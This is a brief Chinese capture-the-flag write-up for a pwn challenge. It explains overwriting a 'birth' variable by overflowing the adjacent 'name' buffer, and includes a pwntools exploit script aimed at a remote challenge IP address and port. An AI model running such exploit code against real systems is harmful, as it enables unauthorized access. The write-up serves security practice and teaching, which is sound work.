查看源码已知birth=1926可以得出flag
但是源码在直接输入birth=1926时候进行了过滤
根据ida给的name和birth可以发现他们相差八个字节
所以在进行输入name时可以进行覆盖 构造payload=‘a’*8+p32(1926)
EXP
coding=utf-8
*from pwn import *
p= remote(‘111.198.29.45’,33452)
#远程连接
payload = ‘a’*8 + p32(1926)
#p32表示传输的是一个四字节数
p.recvuntil(“What’s Your Birth?\n”)
p.sendline(“28”)
#sendline相当于发送一行数据
p.recvuntil(“What’s Your Name?\n”)
p.sendline(payload)
p.interactive()
#与shell交互